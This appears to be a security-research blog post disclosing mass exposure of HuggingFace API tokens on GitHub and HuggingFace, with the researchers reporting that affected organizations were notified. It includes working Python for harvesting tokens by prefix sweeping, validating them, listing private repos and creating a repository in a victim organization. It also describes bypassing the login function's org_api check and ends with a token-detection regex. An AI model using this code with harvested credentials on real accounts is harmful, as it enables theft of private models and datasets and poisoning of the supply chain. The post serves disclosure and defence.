Because HuggingFace and GitHub are critical platforms for the developer community, we decided to take a deeper look into their registries. In this research, we discovered thousands of API tokens exposed to malicious actors, leaving millions of end users vulnerable.
A large language model (LLM) is a type of artificial intelligence (AI) algorithm that uses deep learning techniques and massive data sources to understand, summarize, and generate new content. LLMs are a type of generative AI architected to produce many kinds of output (text, images, video, and more), and this groundbreaking technology has taken the world by storm.
LLM technology is conversational, unstructured, and situational by nature, making it easy for anyone to use. Today it is a non-negotiable asset for businesses striving to maintain a competitive advantage. Recognizing its potential to boost productivity and efficiency, organizations are deploying AI tools that incorporate LLM and Generative AI (GenAI) technology in their operations.
Alongside the swift adoption of LLMs and generative AI, HuggingFace has become the go-to resource for developers working on LLM projects. One of its key offerings is the open-source Transformers library. The HuggingFace registry hosts more than 500,000 AI models and 250,000 datasets, including pre-trained models such as Meta-Llama, Bloom, and Pythia that have revolutionized how machines understand and interact with human language.
One highlight of the platform is the HuggingFace API, accessible through its Python library, which allows developers and organizations to integrate models and to read, create, modify, and delete repositories and the files within them. HuggingFace API tokens are therefore highly significant for organizations, and exploiting them could lead to major negative outcomes such as data breaches, the spread of malicious models, and more.
Understanding that HuggingFace is a critical platform for the developer community, we decided to take a deeper look into the registry. During November 2023, we investigated HuggingFace's security posture and searched for exposed API tokens, which could lead to the exploitation of three of the emerging risks in the new OWASP Top 10 for Large Language Models (LLMs):
1) Supply Chain Vulnerabilities - The LLM application lifecycle can be compromised by vulnerable components or services, leading to security attacks. Using third-party datasets, pre-trained models, and plugins can add vulnerabilities.
2) Training Data Poisoning - This occurs when LLM training data is tampered with, introducing vulnerabilities or biases that compromise security, effectiveness, or ethical behavior. Sources include Common Crawl, WebText, OpenWebText, and books.
3) Model Theft - This involves unauthorized access, copying, or exfiltration of proprietary LLM models. The impact includes economic losses, compromised competitive advantage, and potential access to sensitive information.
Focused on uncovering exposed tokens, our research aimed to assess the extent of the potential risks and weaknesses. By scrutinizing HuggingFace and GitHub, our goal was to provide actionable insights that strengthen security measures and protect against potential threats, ensuring the robustness of the platform's infrastructure and helping organizations safeguard their LLM investments.
At the beginning of the research, we scanned GitHub and HuggingFace repositories for API tokens using their search functionality. On GitHub we used the option to search code by regex, but we encountered a problem: this kind of search displays only the first 100 results. Searching for the HuggingFace token regexes (both user and org_api tokens) therefore returned thousands of hits, of which we could read only 100. To overcome this obstacle, we lengthened the token prefix: by brute forcing the first two letters of the token, each query matched fewer results per request, giving us access to all of the available results.
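The prefix brute-force workaround above can be sketched as follows. The token pattern is partly an assumption (user tokens begin with "hf_", but we do not rely on an exact body length), and for brevity the sweep covers only lowercase two-letter prefixes; a full sweep would enumerate the whole token alphabet:

```python
import re
from itertools import product
from string import ascii_lowercase

# Loose pattern for HuggingFace user tokens: "hf_" is the documented prefix,
# the body-length range is an assumption.
TOKEN_PATTERN = re.compile(r"hf_[A-Za-z0-9]{30,40}")

def prefix_queries():
    """Expand the short "hf_" prefix into 676 longer prefixes ("hf_aa" ... "hf_zz").

    Each longer prefix matches a smaller slice of the token space, so every
    individual code-search query stays under the 100-visible-results cap,
    while the union of all the queries still covers every token.
    """
    return [f"hf_{a}{b}" for a, b in product(ascii_lowercase, repeat=2)]
```

Each prefix in the returned list becomes one search query, and the per-query result counts shrink accordingly.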
HuggingFace was even harder to scan. Its search does not accept regex, but it does accept substring queries, which let us retrieve everything. Oddly, though, when we searched for a substring such as "hf_aa", the results did not all contain that substring; instead they included text starting with hf_axxxxx or hf_xaxxxxx. (Weird, right?!)
After adjusting our queries and rescanning, we successfully collected the tokens from both platforms. The next step was to check which tokens were valid, so we called HuggingFace's 'whoami' API, which returns details about the account behind each token.
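A token-validity check of this kind can be sketched against the hub's public `whoami-v2` endpoint (the endpoint that the `huggingface_hub` client's `whoami()` wraps); the response fields noted in the comment are illustrative:

```python
import json
import urllib.error
import urllib.request

WHOAMI_URL = "https://huggingface.co/api/whoami-v2"

def check_token(token: str):
    """Return the account payload for a valid token, or None if it is rejected."""
    req = urllib.request.Request(WHOAMI_URL, headers={"Authorization": f"Bearer {token}"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            # Payload includes the account name, account type, and org memberships.
            return json.loads(resp.read())
    except urllib.error.HTTPError:
        return None  # 401/403: invalid or revoked token
```

Running every harvested token through a check like this separates the live credentials from the dead ones.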
We then mapped all users and their permissions, and listed all the models and datasets they have access to (private and public).
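The enumeration step can be sketched against the hub's REST listing endpoints (the same API that `huggingface_hub`'s `list_models` and `list_datasets` wrap); the `author` query parameter is an assumption based on the public API, and whether private repos appear depends on the token's scope:

```python
import json
import urllib.request

HUB_API = "https://huggingface.co/api"

def list_resources(author: str, token: str, kind: str = "models"):
    """List repo ids under `author` of the given kind ("models" or "datasets").

    With an Authorization header, the listing can also include private repos
    visible to the token, which is what made the exposed tokens so valuable.
    """
    req = urllib.request.Request(
        f"{HUB_API}/{kind}?author={author}",
        headers={"Authorization": f"Bearer {token}"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return [item["id"] for item in json.loads(resp.read())]
```

Looping this over every account a valid token belongs to yields the per-user map of accessible models and datasets.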
In this research, our team unearthed a staggering 1,681 valid tokens laid bare through HuggingFace and GitHub, opening the door to unprecedented discoveries.
This massive effort enabled us to gain access to 723 organizations' accounts, including some of the highest-value organizations: giants like Meta, HuggingFace, Microsoft, Google, VMware, and more. Intriguingly, 655 of the users' tokens were found to have write permissions, 77 of them to various organizations, granting us full control over the repositories of several prominent companies. Notably, the organizations with such extensive exposure included EleutherAI (Pythia) and BigScience Workshop (Bloom), highlighting the extent of our research's impact and its potential implications for supply chain attacks and organizational data integrity.
Notably, our investigation revealed a significant breach in the supply chain infrastructure, exposing high-profile accounts. The ramifications of this breach are far-reaching: we successfully attained full access, with both read and write permissions, to Meta Llama2, BigScience Workshop, and EleutherAI, organizations whose models have millions of downloads - an outcome that leaves them susceptible to potential exploitation by malicious actors.
The gravity of the situation cannot be overstated. With control over an organization boasting millions of downloads, we now possess the capability to manipulate existing models, potentially turning them into malicious entities. This implies a dire threat, as the injection of corrupted models could affect millions of users who rely on these foundational models for their applications.
The example below shows the creation of a new model repository in the meta-llama organization:
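With the `huggingface_hub` client this is a single `create_repo` call; a raw equivalent can be sketched as follows, where the endpoint path and payload mirror what that client sends and the org and repo names are placeholders:

```python
import json
import urllib.request

# Endpoint behind huggingface_hub's create_repo() (path is an assumption
# based on the client's behavior).
CREATE_URL = "https://huggingface.co/api/repos/create"

def create_model_repo(token: str, org: str, name: str):
    """Create a new model repository under `org`; requires a write-scoped token."""
    payload = json.dumps({"type": "model", "organization": org, "name": name}).encode()
    req = urllib.request.Request(
        CREATE_URL,
        data=payload,  # providing data makes this a POST request
        headers={
            "Authorization": f"Bearer {token}",
            "Content-Type": "application/json",
        },
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.loads(resp.read())  # the hub replies with the new repo's URL
```

A write token leaked by any member of an organization is enough for a call like this to succeed under that organization's namespace.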
The implications extend beyond mere model manipulation. Our research also granted us write access to 14 datasets with tens to hundreds of thousands of downloads a month. Alarming as it is, this opens the door to a malicious technique known as Training Data Poisoning. By tampering with these trusted datasets, attackers could compromise the integrity of machine learning models, leading to widespread consequences.
When we compared OWASP's Model Theft vulnerability to our findings, we found we were able to "steal" over ten thousand private models. Furthermore, these models were associated with over 2,500 datasets. However, while Model Theft has its own entry in the new OWASP Top 10 for LLMs, no one talks about the stealing of datasets. We therefore believe the expert community should consider renaming the vulnerability from "Model Theft" to "AI Resource Theft (Models & Datasets)".
An additional finding we came across while researching these vulnerabilities was that HuggingFace had announced the deprecation of org_api tokens, and had even blocked their use in the Python library by checking the token type in the login function.
We therefore decided to investigate, and indeed the write functionality no longer worked. However, after small changes to the library's login function, the read functionality still worked, and we could use the exposed org_api tokens we had found to download private models (e.g., Microsoft's).
Following our discoveries, we reached out to all affected users and organizations and asked them to mitigate the exposure. Committed as we are to user security and the safety of the models, we recommended that they revoke their exposed tokens and delete the tokens from their repositories. We also informed HuggingFace about the vulnerability we found; it was subsequently fixed, and org_api tokens are no longer usable for reading. Many of the organizations (Meta, Google, Microsoft, VMware, and more) and users acted quickly and responsibly, revoking the tokens and removing the public access-token code on the same day as our report.
Organizations and developers should understand that HuggingFace and similar platforms are not taking active measures to secure their users' exposed tokens.
To fellow developers, we advise avoiding hard-coded tokens and following token-handling best practices. Doing so spares you from having to verify, for every commit, that no tokens or sensitive information were pushed to your repositories.
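One lightweight best practice is a pre-commit scan for token-shaped strings. A minimal sketch, assuming loose patterns for the two HuggingFace token shapes discussed above (the prefixes are documented; the body lengths are assumptions):

```python
import re

# Loose patterns for HuggingFace user tokens ("hf_...") and the deprecated
# org_api tokens ("api_org_..."); body-length ranges are assumptions.
TOKEN_PATTERNS = [
    re.compile(r"hf_[A-Za-z0-9]{30,40}"),
    re.compile(r"api_org_[A-Za-z0-9]{30,40}"),
]

def find_tokens(text: str):
    """Return every token-shaped string found in `text`."""
    return [m.group(0) for p in TOKEN_PATTERNS for m in p.finditer(text)]
```

A Git pre-commit hook can run `find_tokens` over each staged file and abort the commit (exit non-zero) whenever it returns matches, so a leaked token never reaches the remote repository in the first place.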
We also recommend that HuggingFace continuously scan for publicly exposed API tokens and either revoke them or notify the affected users and organizations. A similar mechanism has been implemented by GitHub, which revokes an OAuth token, GitHub App token, or personal access token when it is pushed to a public repository or public gist.
In a rapidly evolving digital landscape, early detection is of major significance in preventing potential harm when securing LLMs. To address challenges such as exposed API tokens, Training Data Poisoning, Supply Chain Vulnerabilities, and Model and Dataset Theft, we recommend applying token classification, as well as implementing a security solution that inspects IDEs and code reviews, specifically designed to safeguard these transformative models.
By promptly addressing these issues, organizations can fortify their defenses against the threats posed by these security vulnerabilities. The landscape of digital security demands vigilance, and our research serves as a crucial call to action in securing the foundations of the LLM realm.